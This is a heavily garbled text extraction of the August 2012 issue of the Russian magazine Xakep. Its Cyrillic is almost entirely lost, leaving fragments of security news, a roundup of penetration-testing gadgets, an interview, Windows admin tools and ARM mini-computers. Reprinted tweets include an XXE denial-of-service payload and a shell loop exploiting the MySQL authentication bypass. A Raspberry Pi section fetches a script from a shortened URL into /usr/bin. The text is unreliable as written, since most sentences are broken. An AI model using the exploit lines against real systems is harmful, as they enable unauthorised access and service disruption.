Хакер 2012 08 PDF

026
WWW.XAKEP.RU
08 (163) 2012
-:

- 35 $
: 230 .
018
14 ,

054
059
114
PHP

LINUX MINT?
, 2012. .
, ,
. Kaspersky Internet Security.
www.kaspersky.ru
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

PC_ZONE UNITS
UNIXOID SYN/ACK
MALWARE

PR-
step (step@real.xakep.ru)
(goltsev@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)

(vagizova@glc.ru)
DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-
(alik@glc.ru)

(bessonovart.ru)
PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906

-

, ,
(,
), , ,
. -
, - ,
- .. . ( )
- .
, , LinkedIn
Last.fm. SHA1 , MD5 (,
plaintext). , , GPU ,
.

7080 .
, -
!
, - . , ,
?
,
, , , .
. bcrypt PBKDF2 c .
.
gorl,
. .
P. S. 11 Intro .
, .
;).

.: (495) 935-7034, : (495) 545-0906

TECHNOLOGY

CORPORATE
-
(zinaidach@glc.ru)
(filatova@glc.ru)
(polikarpova@glc.ru)
(melnikova@glc.ru)
(kachurin@glc.ru)
( )
(tatarenkova@glc.ru)
(bulanova@glc.ru)
(korenfeld@glc.ru)
(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 218 500 .
.
. ,
, . .
.

: content@glc.ru.
, , 2012
Content
012
HEADER
004
011
MEGANEWS

hacker tweets
-
016
017
,

NFC,
ANDROID.
.

Proof-of-concept

COVERSTORY
026

, ][

COVERSTORY
018

14
038
114
PCZONE
032
038

15
Windows-,

- -
Raspberry Pi, Cotton Candy, CuBox,
PandaBoard, Trim-Slice AllWinner A10
044
050
054
059
064
068
Easy-Hack

PHP
PHP

PHP
-
X-Tools
7
102
UNIXOID
108
114
120
124
128
078
138
140
090
096
098
Windows Phone 7.5

2814789

,

:
?
Be quick or be dead

SATA 3.0
, , Z77 !
GIGABYTE G1.Sniper 3
084

NetFlow
FERRUM
132

, ?
, !
Flamer

Linux
3.0 3.4

Linux Mint 13 Maya

,
Ubuntu Linux 8-
SYN/ACK
MALWARE
070
Highload. 2

143
144
FAQ UNITED
FAQ
8,5
WWW2
web-
MEGANEWS

BIOS

40%,

.
GOOGLE CODE JAM

Mebromi,
BIOS (Award BIOS), . CBROM
BIOS.
BIOS
(MBR) ,
winlogon.exe winnt.exe Windows XP 2000/2003
.
MBR
. ,
BIOS. Mebromi
!
Award BIOS, MBR.
McAfee ,
Niwa!mem.
, Mebromi, MBR
DLL, cbrom.
exe Award BIOS. :
, BIOS
.
:
Niwa!mem

,
Mebromi,

.

Angry Birds
,
.
004
PAYPAL .
XSS, CSRF, SQL
injection
.
Google Code Jam ,

: Google 2003 .

( Google, - :)). ,
.
,
. Google Code Jam 2012,
500 .
25 ,
- . ,

, :
EgorKulikov, eatmore, andrewzta, Burunduk1, vepifanov Dlougach.

Vasyl sdya. () 27 , - Google.

.

35 000 , 76 000 (
rookee.ru).
MICROSOFT
HTC ,

ARM-
Windows 8.
.
23 100

Google.
Google.
08 /163/ 2012
MEGANEWS
HDD : 9,6 .
SIRI
SIRI
Kaspersky Lab
3,5
2,5 ,

.
IPAT

.
,
,
.
Siri,
iPhone
iPad. ,
Siri Apple, . . -,
Apple ,
.
-,
,
,
,
. ,
,

.
. ,
Apple , .
Apple ,
, Apple
Siri
.
, , ,
, (Prem Natarajan), -
Raytheon BBN Technologies (),
-

. , Apple

,
. ,
, Apple ,
CPU .
Apple ,

,
Siri, -, GPS , .
,
. (eugene.kaspersky.ru/2012/06/26/kill-the-troll),
, . : IPAT
. IPAT .
2008 34 , Symantec, Sophos, McAfee,
F-Secure, CA, Trend Micro, Novell, Eset, Microsoft .
,
. 5,311,591
5,412,717 90- , IPAT.
, ,
.
IPAT .
WITH PREJUDICE, IPAT
! . ,
:).
APPLE MAC OS X
MAC OS
,
MAC OS X
, DOESNT
GET PC VIRUSES
006
08 /163/ 2012
MEGANEWS
MCAFEE: 83% .
GOOGLE

,
Crypto-Gram , , Vupen, Netragard .
: Forbs
,
- ( ). Forbs,
, 250 .
, , ,
. 2010 .
, ,
,
.
. Microsoft, Google
,
.

. ,
, :
.
Guardian,

.
: ,
;
Facebook Apple, ;
.
, ,
, ,

Skype. Google
:

. , ,
/ , , SMS
, ,
, URL Google.
,
Google

( ).

,

MD5CRYPT -
,

.

LinkedIn, eHarmony
Last.fm.
( 50 )
-
,
, SHA.
008
FACEBOOK
,
,
The New York
Times.

DO
NOT TRACK,
: Microsoft ,
IE 10 DNT
.
08 /163/ 2012
MEGANEWS
57% , Business Software Alliance.
WINDOWS 8 SECURE BOOT

LINUX
,
Linux
,
(Secure Boot) Windows 8
UEFI. ,
, Windows 8, Secure Boot
,

Microsoft OEM- . Secure Boot, ,
,

.
, UEFI
, . Microsoft Open Source ,
, ,
.
, Fedora Red Hat
Microsoft, , Windows 8.
, .
,
. ZDNet ,
.
UEFI-, Verisign 99 .
, :
UEFI,
,
. Fedora
99 ,
. Linux ,
, Linux-
Microsoft, Fedora ,
.
:

Linux. , , ,
, ,
, -
. ,
,
() . ,
, .
, Windows 8 UEFI
:
, , ,
,
(
?)
, .
Unified Extensible Firmware

Interface (UEFI)
,

. BIOS,

.
POSITIVE HACK DAYS 2012

IPHONE
4S, 0-DAY
WINDOWS XP

FREEBSD
010
08 /163/ 2012
#hacker tweets
@mihi42:
<!ENTITY % a SYSTEM 'http://

www.w3.org/QA/TheMatrix.
xml'><!ENTITY b '%a;'> #java
#jaxp #DoS CVE-2012-1724 https://t.co/
PguomymA @Agarri_FR
:
. ,
Java 7 Update 5 6 Update 33
.
@cBekrar:
MS
500 000 ,
#BlueHatPrize anti-ROP,
,
.
@0xcharlie:
@andreybelenko:
,
: t.co/2SGIJ8oU.
,
ASLR iOS 6.
-
.
?
@sanjar_satsura:
... ,
,
Flame,
. ][
:
][! !
:)
@hdmoore:
: $ for i in `seq 1
512`; do echo 'select @@version;'
| mysql -h 127.0.0.1 -u root mysql
--password=X 2>/dev/null && break; done
:
, .
MySQL
memcmp(). MySQL. goo.gl/EtbCO.
Microsoft
BlueHatPrize. , 250 000 ,

.
: ,
DCIM
? DCIM :
Digital Camera IMages.
@esizkur:
,
PaX
: BlueHat
.
:

BlueHatPrize.
@crypt0ad:
@mikko:
, calc.exe,
,
.
@homakov:
@justinelze:
,

alert(test)
.
,
CSRF-
, PHP.
, CSRF- .
#php
@opexxx:
@taosecurity:

, ,
Microsoft , Huawei.
Reverse mirroring;
.
08 /163/ 2012
@DEVOPS_BORAT:
,

, .
select * from LastFm where

hash=md5('yourpassword')
:
: LinkedIn,
Last.fm ...
011
MEGANEWS
100 000 WINDOWS PHONE MARKETPLACE, Microsoft.
-
SMARTKEY TV
NFC
ANDROID- ,
LiquidTv. ,
SmartKey TV , -
Android 4.0 Ice Cream Sandwich, ,
HDMI-
. ,
Cortex A9 1
Mali-400 ARM, Full
HD 1080p, 512 , 4 -,
Wi-Fi, microSDHC miniUSB. SmartKey TV
DLNA ,
. Google Play
. Skype, , ,
, .
, .

. Android-.
SmartKey TV 99 120
QWERTY- .
VOLVO

.

200 .
012
GOOGLE ICANN

50 ,
.google, .youtube
.lol.

:).
55
, :
7,5
6,3 ,
.
ymantec Android,
, NFC. ,
NFC
.
. ,

. . , NFC,
Android.Ecardgrabber.
, ,
. .

NFC. Google Play 13 ,
100 500 .
.
,
: MasterCard
GeldKarte.
MOZILLA

Mozilla Marketplace, .
200
.
NOKIA
;
10 000
(20% ),

Vertu.
08 /163/ 2012
DROPBOX , .

IVY BRIDGE
IPV6

INTEL ULV-

Ivy Bridge
110
.

,

.
IPv6,
6 2012 , .

IPv4, 3,7 .
- 6 IPv6. ,
IP-
, . IPv4,
, ,
. IPv6 ,

-. Google, Yahoo Facebook
,
IPv6, IPv4.
IPv6 Google, Yahoo, Microsoft,
Facebook, Cisco, Akamai Limelight.
-
- - .
, IPv6
, Comcast AT&T ,
France Telecom , XS4ALL . , Cisco Linksys, D-Link ,

IPv6.
IPv6 . , ,
- ARIN, :
, IPv4 IPv6, -
, .
,
, ,
. , ,
, ,
, :).
Intel Ivy Bridge, ,

. Intel
Ivy Bridge. ,
.
U. Core i5 Core i7 (31 ).
Core i3 . Ivy
Bridge 22- .
, (Sandy Bridge),
.
Intel, ,
. , USB
3.0 Thunderbolt
. , . , ,
, ,
.
FLAME
,
,

08 /163/ 2012
013
MEGANEWS
1 246 713 URL 24 129 Google .

LINKEDIN
6 458 020 LinkedIn 1,5 MD5-

eHarmony forum.
insidepro.com. LinkedIn
, , ( ).
LinkedIn ,
SHA-1 ( ) LinkedIn. , ,
.
, , ,
. LinkedIn ,
, . ,
-
LinkedIn. 1,5 MD5-
eHarmony, ,
95% .
236 578
Polimo

,
.
Raspberry Pi
Raspberry Pi Foundation 2011 , .
, 2535 . ,
?
, , . -,
, Raspberry Pi
. -, ,
, Wi-Fi-
USB, Linux ?
PwnPi
(pwnpi.sourceforge.net) Raspberry Pi,
. ,
,
,
.
,
Raspberry Pi Parrot DF3120 25 . 3,5
Bluetooth. , , ,
.
(Millennium Technology Prize

2012) Linux.

.

,
.

600 .
014

(29%
) (10%),

Superjob.ru.
IPHONE IPAD

, ,
,
Bay.ru.
08 /163/ 2012
NOKIA , Nokia AIR.
MICROSOFT
SURFACE
,

Microsoft

Surface
.

.
,
, . Microsoft
Windows- Surface,
.
Surface Windows
RT Windows 8 Pro ( ).
10- -,
- Touch Cover,
3 .
, ( SmartCover iPad). ,
, Apple.
Type Cover,
, , . , Type Cover
, .
.
,
Windows RT Windows 8 Pro, . , NVIDIA Tegra,
microSD, USB 2.0, Micro HD Video,
676 9,3 .
Intel Core i5 (Ivy Bridge),
microSDXC, USB 3.0, Mini DisplayPort 903 13,5 . -
10 , 6 .
VaporMg,
. , .
Gorilla Corning Glass.
,
3G/4G? , . ,
Wi-Fi .
,
, Windows RT ( NVIDIA Tegra 3)
499599 ,
Intel Ivy Bridge Windows 8 Pro - 999 . Microsoft , ARM-
( Surface Windows RT) (
Surface Windows 8 Pro), .
, ,
Surface Windows RT, - Microsoft. ,
OEM-
2013 Windows RT ,
. Surface, , .
.

-
USB-,

91 1,95 .

08 /163/ 2012
015
HEADER

Mockingbird

,
, .
-
. , ,
: .
,
, -
, :

, .

. ,
,
, .

, .
.
, , ,
.
. ,
dragndrop ,
, , .

.
:
?
,
,
016
Balsamiq Mockups (www.balsamiq.com). Adobe AIR

. .

(, , ), , .
mockingbird (gomockingbird.
com). ,

-
. :

UI,
, ,

( :
).
, , .
,
,
.
mockignbird ,

,
, .
InPreso Screens (www.inpreso.com).
( ?!),

.
, ,
Windows 7 Mac OS X. ,

.

, ,
. , : iOS
Android. proto.io, .

,
. ,
iPhone
,
.
.
. ,
usability, , .
, ,

, . z
08 /163/ 2012
(alizar@gmail.com)
Proof-of-Concept

HTTP , .
,
.
, .
, Wi-Fi-- ( Firesheep DroidSheep).
- , .
HTTPS, . ,
:
- , XSS, XST , HTTPS
.
, , .
: ,
? One Time
Cookies, OTC (www.cc.gatech.edu/~idacosta/otc/index.html). , OTC
.

, HTTPS-, HMAC (Hash-based Message
Authentication Code) ,
, . OTC. ,
( )
,
.
, HMAC
. , ,
HMAC.

,
, ( ).
OTC
, , . , , .
OTC
HTTPS.

uid, pwd:
ks, ns: ,
kw: -
ts, th:
url:
data: POST
v: OTC
OTC
08 /163/ 2012
cid: (credentials) OTC

domain, path: OTC
E(k, x): x k
HMAC(x): -
x
X-OTC: HTTP
OTC
OTC, ,
. WordPress (www.
cc.gatech.edu/~idacosta/otc/otc_wp_plugin.zip),
Firefox (www.cc.gatech.edu/~idacosta/otc/
otc.xpi).
, ,
,
Wireshark Live HTTP Headers Firefox. z
017
COVERSTORY
14
, ,
,
.
(The Art of Intrusion)
,

. ,
.

( ).
Wi-Fi. ,
, - .
,
.
018

007.

. ? .
08 /163/ 2012
WiFi Pineapple Mark IV

wifipineapple.com
,
, - , , ,
: ?
, - , ( ,
) MITM-,
, .

Wi-Fi Guest .
- (Rogue AP) .

, .
WiFi Pineapple, 2008 ,
.
.
, (
Atheros AR9331 SoC 400 ), ,
OpenWRT , , Karma, DNS Spoof, SSL Strip, URL Snarf,
ngrep . , ,
( -)
.
,
(
Battery Pack), - , .
99,99
Ubertooth One
ubertooth.sourceforge.net
119,99
Wi-Fi,
, Bluetooth .
, ShmooCon 2011 ( youtu.be/KSd_1FE6z4Y),
Ubertooth (ubertooth.sourceforge.net).
. BT-
, 10 000 .
, ,
. , USB-
, ARM
Cortex-M3. ,
promiscuous,
Bluetooth-,
. , ,
, , . Ubertooth One Bluetooth-,
Kismet (kismetwireless.net).
, ,
.
08 /163/ 2012
019
COVERSTORY
ALFA USB WiFi AWUS036NHA

bit.ly/OokY6l
,
, ,
Wi-Fi-,
. , , , , :). ,
.
, ,
.
ALFA USB WiFi AWUS036NHA. Wi-Fi USB-
Alfa AWUS036NHA,
Atheros AR9271 b/g/n ( 150 /).

, -
BackTrack 5, . , USB-
, ( Backtrack),
USB-.
Pineapple Mark IV.
2.2.0 Pineapple
deauth-. : ,
. WPA handshake,
WPA-.
99,99
020
35,99
Reaver Pro
bit.ly/IRrZfF
,
WPA- .
,
WPS.
][_03_2012,
Reaver (code.google.com/p/reaver-wps). , .
. WPS pin,
, WPA-. , , . Reaver
4 10 WPS pin. , ,
, ,

. WPA-,
( handshake),
WPS .
:
, .
Reaver Pro
WiFi Pineapple Mark IV ( ). ,
Reaver Pro, , .
08 /163/ 2012
16dBi Yagi Antenna

bit.ly/MXT1Tv
. .
-
.
. ( omni), .
16dBi Yagi Antenna.

RP-SMA
.
iFi Pineapple,
ALFA AWUS036H, WiFi
. ,
Ubertooth One, Wi-Fi-.
.
,

,
(, ).
30
69,99
08 /163/ 2012
USB Rubber Ducky

usbrubberducky.com
USB, Teensy.
, HID- () , , , ,
(, ).
USB Rubber Ducky Teensy. 60 32- AVR- AT32UC3B1256,
- . Duckyscript ( bat-),
. , Wi-Fi-, reverse ,
. microSD-,
.
, ,
, .
, , , .
021
COVERSTORY
7
8
Throwing Star LAN Tap
bit.ly/LYOW2f
- , : , ,
.
.
, ,
, .
? Throwing Star LAN Tap
, Ethernet-. ,
( ), .
Throwing Star LAN Tap.
J1 J2, J3 J4
. , J3 J4
, , , ( ). Throwing
Star LAN Tap 10BaseT
100BaseTX
. , 1000BaseT.
,
( 100BaseTX),
. ,
( Open Source hardware).
14,99
100
GSM/GPS/Wi-Fi-
www.google.com
,
, jammer , -,
. - , .
, , ,
.
(GSM),
, , , GPS-,

. ,
, .
( )
, , , .
,
-.
,
.
, ( !), ,
,
.
022
08 /163/ 2012
RFID 13.56MHz Mifare

-
bit.ly/MQlw6e
,
.
Mifare Classic 1K.
, () , , .
0,5, 1 4 , 16 .
( ). Mifare 10 ,
100 000. ,
. ,
, .
,
, .
: , , :).
bit.ly/MQlw6e,
65 . ,
,
. , ,
, Mifare Ultralight. ,
, NFC, ZigBee .
NFC, , RFID,
.
10
149,99
08 /163/ 2012
65
KeyGrabber
www.keelog.com
- ,
.
:
. ,
,
KeyGrabber, PS/2,
USB-. ,
.
, , . ,
,
Wi-Fi-,

e-mail.
. , , KeyGrabber
Module ,
PS/2- USB-.
VideoGhost , , (2 ).
DVI-, HDMI-, VGA-,
149,99 .
023
COVERSTORY
MiniPwner
www.minipwner.com
11
,
,
. MiniPwner ,

/
.
,

- .
.
SSH- . ,
TP-Link TL-WR703N,
4 ,
802.11n Ethernet-. OpenWrt,
,
: Nmap, Tcpdump,
Netcat, aircrack kismet, perl, openvpn, dsniff, nbtscan, snort,
samba2-client, elinks, yafc, openssh-sftp-client .
, , 1700 ,
,
. ,
, , .
99
Pwn Plug
pwnieexpress.com
12
595
024
MiniPwner, Pwn Plug

drop-box-
,
/. ,
.
, Pwn Plug
.
,
Debian 6, , , .
Elite- . , : 3G, Wireless USB-Ethernet.
SSH 3G/GSM
. , Text-to-Bash:

SMS-. HTTP-, SSH-VPN OpenVPN.
Metasploit,
SET, Fast-Track, w3af, Kismet, Aircrack, SSLstrip, nmap, Hydra, dsniff,
Scapy, Ettercap, Bluetooth/VoIP/IPv6
.
16- SDHC-. Wireless- 3G
USB-Ethernet , ,
.
. , , ,
, .
08 /163/ 2012
AR.Drone
ardrone.parrot.com
.
, ,
... ! -.
,
. , AR.Drone ,
.
: .
AR.Drone ,
, , , , , .
:
,
. :
iPhone, iPad Android, . ,
. ,
, . ,
: bit.ly/GVCflk
, ; bit.ly/o8pLgk ,
; bit.ly/fhWsjo
, , .
14
08 /163/ 2012
299
13
Raspberry Pi
25
raspberrypi.org
Raspberry Pi,
. , Raspberry Pi
Foundation. ARM 11
700 M
.
, ,
. /, USB 2.0,
SD/MMC/SDIO, Ethernet-,
HDMI-. ,
drop-box. ,
, ,
Wi-Fi- USB Linux . Linux- Debian, Fedora, Ubuntu,
PwnPi (pwnpi.sourceforge.net),
Raspberry Pi.
.
I2P, Metasploit,
.
025
COVERSTORY

][
: ,
, ,
. ,
, ,
.
, ,

,
.
026

, ,
Endeavor Security. 800 . ,
: endeavorsecurity.blogspot.com.
, .
, ,
, ,
. . ,

, .
.
, . , , c
XSS. , , . -
!

. , , , , .
-.
08 /163/ 2012

, , .
,
,
13
,
.

2010 .

08 /163/ 2012
027
COVERSTORY

2008 ,
, ,
. Macrovision
- ,
.
Endeavor Security.
:
,
.
,
, ,
.
: , ,
? - .
,
: , - ,
,
.
. ,
! ,
.
, -, . ,
, , .
,
. ,
C
C++ .
void,
. : ,
? , , ,
. ,
.
:
? ,
C define.

,
. ( C89)
,
, .
, ,
, , , , ,
. ,
15
!
crack me
,
. : .
, .
crack me ,
,
, .
?
, ,
?
028
,

, .
,
300 000 , :
.
-
- 150200 , 300 . .
Endeavor Security,
- .
.
, ,
, ,
. : 300
, .
, , 3000 ,
300 ?! :) ,
, 170 .
Endeavor,

. ,
Endeavor McAfee,

.
, :
300 Cryptograph Research
-
170 . , ,
.
,
, , . ,
,
.

.
,
.
:
,
. !
? !
,
, . , -
. Endeavor
,
, . ,

, :). ,
.
-! ,
.

Panda Security , . -,

,
, revenue 5%. ,
IT-.
( 75
) ,
. .
, c Codegate 2009.
Soft Forum
, -
08 /163/ 2012
.
, - : HR-,
,
, ,

- .
, .
: ,
, . , -
.
, .
,
. : L-1
( ) O-1
.

. L-1,
McAfee,
. O-1 :
, . :
, .
,
, . , ,
.
, ,
,
.
,
, , .
, , ,
. : ,
,
. ,
,
L-1.

. -,
, , , ,
. ,
,
.
, ,
.
, ,

. ? ,

, .
-,
-, ,
, , , ,
. ,
.
08 /163/ 2012

,
: British
Airways, , . .
,
. . ,
:).
-
.
, -
. ? :
. .
: ,
,
.
, -,
!
.
IAD. ,
,
,
, ,
.
McAfee
. (
) ,
. -
-,
,
.
:
, ,
.
.
:
,
. !

Senior Malware Researcher. ,

.
,
. .

: NOT CITIZEN.
, ,
. .
,
. .
, . ,
.
, ,
.

. !
2009
McAfee!
Operation Aurora. ,
.
- , 40 000 ,
. ,
.
.
, -,
.
, . ,
. ,
.
, ,

? , .
, Linux vim
! , ,
. ,
, , ,
.
,
.
, . , , , ,
,
.
.
, :
, , , , , ,
, .
, QNX . .
, .
,
.
2009
MCAFEE!
OPERATION AURORA.
,
029
COVERSTORY

.
, , ,
, .
,
.
.

.
, ,
, ,

.
, . .
,
.
,
. ,
- .
: 100 ,
, 10 000 ,
,
.

, , , .
: , ,
,
.
,
. , , ,
.
.

? ,
. !
, .
,
- , .
! , ,
. ,

.
, .
:
, .
, . !

.
,
. :
,

. .
? !
, .
- , ,
030
,
, .
- ,
, - .
: ,
, ,
,
.
: ,

.
,
, K?.
.
:
. .
, .
, Endeavor
Security,
.
,
, .
-, , . ,
,
.

. Intel, Oracle, Microsoft, Google,
Symantec . -
.

Endeavour Security
. ,
. , , .
- -

. . ,
.
.
,
-. ,

, .
,
.

,
, ,
. ,
. ,
,

.
, . ,

- . ,
, . ,
.
,

, .
,
15
- --
,
.
.
,
.
: ,
.

.
, !
, !
. -,
. . ,
SSN
- - . SSN
. , ,
. ,
.
. ,

,
SSN. ,

.
.

, .
,
. ,
SSN!

-. !
,
, , .
? .
, . !

,
. ,
, .
.
.
, ,
,
.

. z
08 /163/ 2012
Preview
37 .
.
PC ZONE
38
- -
35 ? , 2012 , !
-
,
.
Raspberry Pi ,
.

. :
,
USB-,
:

. , .
PC ZONE
32

15
Windows-,
.
.
64

, PHP
.
08 /163/ 2012
54

,
.
.
59
PHP

PHP.
.
MALWARE
70

,
. .
78
, !

Flamer

.
031
PC ZONE
urban.prankster (martin@synack.ru)
15
WINDOWS-,

,

,
,

.
,

,

.
032
08 /163/ 2012
ADVANCED IP SCANNER
, , .
Advanced IP Scanner (radmin.ru/products/ipscanner),
. AIPS , . .
AIPS IP- ,
,
IP ; IP ,
.
.
: MAC-,
, , ,
( , HTTP, HTTPS
FTP). ,
( , HTTP, HTTPS FTP).
,
. AIPS
Radmin Radmin Server. (XML, HTML CSV)
( drag-and-drop). , ,
.
Wake-on-LAN, ,
.
NETWRIX INACTIVE USERS TRACKER

NetWrix,
IT-,
(goo.gl/sfQGX),
Windows. ,
NetWrix Inactive Users Tracker (goo.gl/jWEj9)

, -
( , , , ).
IT- ,
.
,
. Free

e-mail ( SMTP), ,
. :
, OU, OU . PowerShell- get-NCInactiveUsers,
( lastLogon) .
(, , ) ;
; ; ;
; /; ;
(uptime, , ).
. ,
,
(avi, mp3 ).
-,
(txt, XML, CSV, PDF)
( , :
MS SQL, MS Access, MySQL, Oracle ), e-mail
.
CHECKCFG

. ,
CheckCfg
(checkcfg.narod.ru).
, , CPU, ,
, S.M.A.R.T. . CheckCfg
. ,
.
, RTF.
CheckCfg .
CheckCfg,
.

Sklad, ,
CheckCfg, , . Sklad_w
( IP-, CPU, Memory,
).
Doberman.
, ,
,

.
MAILARCHIVA OPEN SOURCE EDITION

, MS Exchange,
,
, .
.
WINAUDIT FREEWARE
WinAudit Parmavex Services
(pxserver.com/WinAudit.htm),
. ,
. ,
Windows, 64-.
( ), 30 (
). ,
,
;
08 /163/ 2012
Advanced IP Scanner ,
033
PC ZONE
WinAudit ,
MailArchiva
(mailarchiva.com), (Lotus Domino, MS Exchange, MDaemon, Postfix, Zimbra,
Sendmail, Scalix, Google Apps).
SMTP, IMAP/POP3, WebDAV ilter (
SMTP- Milter-, IMAP/POP-).
, .
( ), (
) ( , ). Open
Source MailArchiva (openmailarchiva.sf.net) ,
(Word, PowerPoint, Excel, OpenOffice, PDF, RTF, ZIP, tar, gz).
MailArchiva Windows, Linux, FreeBSD Mac OS X.
PERFORMANCE ANALYSIS OF LOGS

Windows Performance Monitor,
, . ,

, .
PAL (Performance Analysis of Logs, pal.codeplex.com) .

. MS IIS, MOSS, SQL Server, BizTalk,
Exchange, Active Directory .
PAL Wizard ,
,
( CPU ),
. HTML XML, ,
(Min, Avg, Max Hourly Trend).
.
.
PAL ,
, .
PowerShell PAL.ps1,
. XML-;
, .
PAL Editor.
Win7,
MS, WinXP (32/64).
034
, PAL,
PowerShell v2.0+, MS .NET Framework 3.5SP1 MS Chart Controls for

Microsoft .NET Framework 3.5.
VIRTUAL ROUTER
, Wi-Fi- , . ,
WLAN Wi-Fi.
: , , . Win7/2k8 ( Win7
Starter Edition)
( Virtual Wi-Fi), Wi-Fi-
Wi-Fi-.
Wi-Fi (SAPoint, Software Access Point).
- WPA2.
Win7/2k8R2
Netsh,
,
Virtual Router (virtualrouter.codeplex.com), GUI .
Virtual Router SSD
, . -
. ,
.
RDC- RDCMAN
,
Windows, Remote
Desktop Connection.
RDP- ,
.
Remote Desktop Connection
Manager (RDCMan, goo.gl/QHNfQ), .
RDP-,

. , ,
, .
(, , , ),
08 /163/ 2012
. .
,
, .
. ,
, , . , ,
Connect.
.
Management. , Empty Password User Report ,

GetDuplicates ,
CSVGenerator CSV- Active
Directory. :
, AD ,
SharePoint,
, ,
,
, ( CPU, ,
, ), .
FREE ACTIVE DIRECTORY TOOLS

Active Directory
.
Free Active Directory Tools (goo.gl/g11zU),
ManageEngine.
, .
: AD USer Report, SharePoint Report,
User Management, Domain and DC Info, Diagnostic Tools Session
COMODO TIME MACHINE

System Restore Windows, , , , ,
. Comodo
Time Machine (comodo.com)
.
, . CTM
( ),
, ,
.
System Restore,
.
, .
, .
CTM ;
, <Home>.
,
, .
, , -,
.
,
. ,
.
AMANDA
, Windows
*nix, AMANDA (Advanced Maryland
Automatic Network Disk Archiver, amanda.org). ,

(vtapes),
CD/DVD. AMANDA
unix- dump/restore, GNU
tar , -
, NetWrix Inactive
Users Tracker
08 /163/ 2012
,
POWERSHELL

,

035
PC ZONE
Free Active Directory Tools 13

AD

. - . :
Kerberos 4/5, OpenSSH, rsh, bsdtcp, bsdudp Samba.
Windows-
, , Samba. (GPG amcrypt)
,
.
,
, .
CORE CONFIGURATOR 2.0 FOR SERVER CORE

, Win2k8/R2 Server Core,
. ,
R2 SCONFIG.cmd,
. odeplex
Core Configurator
(coreconfig.codeplex.com).
NetFx2-ServerCore, NetFx2-ServerCore PowerShell.
Start_CoreConfig.wsf ,
, , : , ,
, ,
RDP-, ,
Windows Firewall, / WinRM, , ,
, , Hyper-V DCPROMO.
Load at Windows startup,
.
EXCHANGE 2010 RBAC MANAGER

Exchange 2010 ,

.
PowerShell
. Exchange 2010 RBAC Manager (RBAC
Editor GUI, rbac.codeplex.com), .
.
036
Virtual Router,
C# PowerShell.
Exchange 2010 Management Tools.
POWERGUI
, PowerShell , ,
.
PowerShell Microsoft , .
PowerGUI (powergui.org), PowerShell-.
.
MULTI-TABBED PUTTY
PuTTY
,
SSH, Telnet rlogin. ,
.
.
Multi-Tabbed PuTTY (ttyplus.com/multi-tabbed-putty),
.
: ,

, . z
WWW
INFO
codeplex.com

.
Virtual Router
onnectify
(connectify.me),
Lite-

,

.

mhotspot
(mhotspot.com).

Amanda
Server
Windows: goo.gl/zyNzd.

Comodo Time Machine

EaseUS Todo Backup
Free (goo.gl/uifWC).
PuTTY
Windows,

Unix.
08 /163/ 2012
PC ZONE
(dhsilabs@mail.ru)

,

.

USB-.
038

RASPBERRY PI,
COTTON CANDY, CUBOX,
PANDABOARD, TRIM-SLICE
ALLWINNER A10
-
?
.
, -.
? :) , 1960-
DEC PDP-1, , .
- .
- , USB-.
, ( ,
?)
,
,

.
, , , -
. ,
- ARM-,
, . -
Android, (
,
) Linux. ,
Linux , .

HD-. HDMI-
.
DVI-, ( HDMI-).
, /
HDMI-. . :
( ),
HDMI-, . ,
, ,
.
-.
. USB, , USB-.
USB-
USB-: ,
, .
: USB-:
, .
, ,
Wi-Fi, Ethernet.
08 /163/ 2012
- -
RASPBERRY PI

RASPBERRY PI
Raspberry Pi . ,
,
. , Hexxeh,
. ,
,
.
, rpi-update
:
wget http://goo.gl/1BOfJ -O /usr/bin/
rpi-update && chmod +x /usr/bin/rpi-update
sudo apt-get install ca-certificates

rpi-update root:
sudo rpi-update
-

.
Raspberry Pi, ,
USB-

2011 .
-
, 12
.
, -
, , ,
.
, ,
?
20% ,
, .

, :
, .

Raspberry
Pi B. Broadcom
BCM2835 ( ARM11)
700
256 , ( package-on-package).
BCM2835 OpenGL ES 2.0,
FullHD-.

.
USB- (
, B )
08 /163/ 2012
Ethernet- B.

RCA
HDMI.
SD, MMC SDIO.
SD-.

,
, , . ,
, .
? : -
Debian
Fedora. Linux . ,
Raspberry Pi, 19
,
Debian 6.0, LXDE,
Midori. , -

,
ARM.
,
https://github.
com/Hexxeh/rpi-firmware. rpiupdate :
FW_REPO="git://github.com/Hexxeh/
rpi-firmware.git"
. github.com/Hexxeh/
rpi-firmware.git,
https://github.
com/Hexxeh/rpi-firmware, .
.
SKIP_KERNEL .
SKIP_KERNEL=1,
Raspberry Pi , .
ROOT_PATH/BOOT_PATH -,
SD-.
:
SKIP_KERNEL=1 rpi-update
ROOT_PATH=/media/root BOOT_PATH=/media/
boot rpi-update
35$
farnell.com/raspberrypi
039
PC ZONE
CUBOX
99$
solid-run.com/store
FXI
COTTON
CANDY
199$
store.cstick.com
- . Raspberry Pi
, FXI .
( ),
- CuBox. CuBox
(222 ) 91 .
, , ,
ARM- Marvell Armada 510 ARMv7 800 . 1 , Vivante GC600 GPU, OpenGL 3.0 and OpenGL ES 2.0 2D/3D-.
HD- (Marvell vMeta HD Video Decoder).
, ,
1080p KDE
GNOME Linux. 3 !
Ubuntu
Desktop 10.04 ( Linux
2.6.x) Android 2.2.x ( ).
SD-,
. SD-, ,
2 , ,
Ubuntu Android ( ).

FXI Cotton Candy ( FXI Technologies)
HDMI.
Cotton Candy Samsung Exynos
4210 1,2 (
ARM), 1
Mali-400 MP.
microSD (
64 ).
B
Ethernet-, Cotton Candy
Wi-Fi 802.11b/g/n
Bluetooth 2.1.
Cotton Candy Android 4.0 Ice Cream

Sandwich,
, ARM,
Linux.

. ,

.
CUBOX: DBUS UBUNTU

CuBox Android Ubuntu
10.04 LTS. , Ubuntu
. CuBox .
Ubuntu,
CuBox,
040
DBUS.
HDMI,
,
NetworkManager asoc: CS42L51
<-> mv88fx-i2s1 No matching rates.
CuBox , .
DBUS:
sudo apt-get --reinstall install dbus
08 /163/ 2012
- -
PANDABOARD
UBUNTU PANDABOARD
, PandaBoard Linux
Android. , , Ubuntu.
. PandaBoard OMAP4,
